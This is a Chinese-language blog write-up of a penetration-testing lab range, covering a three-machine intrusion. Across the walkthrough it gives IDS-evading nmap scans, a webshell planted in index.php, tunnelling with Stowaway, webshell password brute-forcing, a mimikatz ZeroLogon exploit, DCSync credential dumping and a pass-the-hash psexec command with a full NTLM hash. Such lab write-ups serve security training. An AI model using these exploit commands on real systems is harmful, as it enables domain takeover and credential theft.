CyberStrikeLab-lab3-WP

lab3

给了个ip访问不成功

image-20250729115420525

第一台机器(192.168.10.10:3590)

namp扫10网段

nmap -sS --min-rate 10000 -f 192.168.10.0/24 -oN lab3.txt
 
-sS:SYN 扫描(半开放扫描)。发送 SYN 包到目标端口,若收到 SYN/ACK 回复则认为端口开放,不完成 TCP 三次握手(直接发送 RST 终止连接)。速度快且隐蔽性强(不会在目标系统留下完整的连接日志)。
--min-rate 10000:要求 Nmap 每秒至少发送 10,000 个数据包
-f:将扫描数据包分成多个小片段(如 8 字节的 IP 分片),可能绕过简单的防火墙或IDS
-oN lab3.txt:将扫描结果以 普通文本格式 保存到文件 lab3.txt 中。

image-20250729120441034

namp对192.168.10.10进行详细的漏扫,发现3590端口有个 wv-csp-sms服务

 nmap -sS --min-rate 10000 -f -p-  192.168.10.10  -oN lab3-10.txt
 
 #-p:扫描所有 65535 个端口(等效于 -p 1-65535)

image-20250729120749195

发现10机器的3590端口开了个 wv-csp-sms服务

image-20250729164300414

网上找nday打

点击管理

image-20250729164417710

查看源代码,发现与默认账号密码 admin ;tao

image-20250729164515702

进去后,点击文件管理,有目录遍历漏洞

进行目录穿越,发现flag

image-20250729164808716

image-20250729164843104

flag2提示:木马留在首页

image-20250729165015606

首页即index.php,往首页写马,

image-20250729165501828

写进去后首页显示了phpinfo的信息,写入成功

image-20250729165522407

哥斯拉连接

image-20250729165428117

发现webshell的权限是systen权限,机器是x86的,即windows的32位

image-20250729165726246

systeminfo查看网络信息,该机器有两张网卡

image-20250729171008396

上传stowaway的32位的客户端到靶机,

image-20250729170024114

搭建隧道

admin端

image-20250729170220653

agent端

image-20250729170244605

用stowaway的admin端穿32位的fscan上去

image-20250729170805941

用fscan扫20网段,发现20网段还有另外两台机器20和30机器

image-20250729171439887

fscan默认扫的端口没发现什么东西,那就fscan扫20机器的全端口

fscan.exe -h 192.168.20.20 -p 1-65535

一个端口一个端口的尝试,发现8085端口有thinkphp框架

image-20250729171841079

建立socks代理

image-20250729172005778

proxifier配置代理

image-20250729172259847

image-20250729172314465

第二台机器(192.168.20.20:8055)

访问192.168.20.20:8055的服务,有thinkphp框架

image-20250729172331779

网页提示说,已经有木马的存在,并且在首页

image-20250729172618963

但是我不知道shell的连接密码

用awBruter.py脚本来爆破连接密码,得用python2来运行,且url下必须加上index.php(提示说的是首页)

但我这里报错了,应该是编码问题

image-20250729174200920

我修改下脚本,强制使用UTF-8编码

把脚本的第92行改成这样

image-20250729174345405

爆破出来后密码为admin123

image-20250729174411827

哥斯拉连接

image-20250729174559542

C盘下找到第二个flag

image-20250729174854162

拿下的是system权限,且该机器是64位的

image-20250729175238976

ipconfig /all查看信息

image-20250729180001809

net time /domain #获取域控的时间。若该命令执行成功,也代表着该主机在域内

image-20250729180145556

第三台机器(192.168.20.30)(域控)

那fscan扫这台30机器看看

开放了445端口smb服务,打一下永恒之蓝(MS17-010)看看

image-20250729180955145

用msf打永恒之蓝,没成功

image-20250729181318713

只能用 CVE-2020-1472 来打这台域控

先用stowaway上线第二台机器,upload一个minikatz上去

用minikatz横向

注意:上传的minikatz的版本必须是2.2.0之后的版本,这个版本才有CVE-2020-1472的poc

传上去后

minikatz.exe #进入minikatz命令
lsadump::zerologon /target:cyberstrikelab.com  /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit 
# zerologon:ZeroLogon漏洞
# cyberstrikelab.com:域名
# WIN-7NRTJO59O7N$ :域控主机名
# /ntlm:尝试使用NTLM认证(多余参数)
# /null:尝试使用空密码(多余参数) 
# /exploit:直接执行攻击(非标准参数)

#利用ZeroLogon漏洞:通过Netlogon协议缺陷,将域控制器(WIN-7NRTJO59O7N$)的计算机账户密码重置为空

image-20250729230006341

lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com/user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:\"\" /authntlm
# 这条命令的作用是获取域控机器的管理员administrator哈希
# /csv:输出格式为CSV(可选参数)
# /domain:cyberstrikelab.com:目标域名
# /dc:WIN-7NRTJO59O7N.cyberstrikelab.com:指定域控制器主机名
# /user:administrator:要导出域控管理员的hash
# /authuser:WIN-7NRTJO59O7N$:认证账户(计算机账户,需以$结尾)
# /authpassword:"":使用空密码(需配合ZeroLogon漏洞利用)
# /authntlm:使用NTLM认证

得到administrator的hash

image-20250729231058821

有了域管的hash,再打个pth攻击拿shell

python psexec.py -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

image-20250729231529302

posted @ 2025-08-07 23:34  破防剑客  阅读(195)  评论(0)    收藏  举报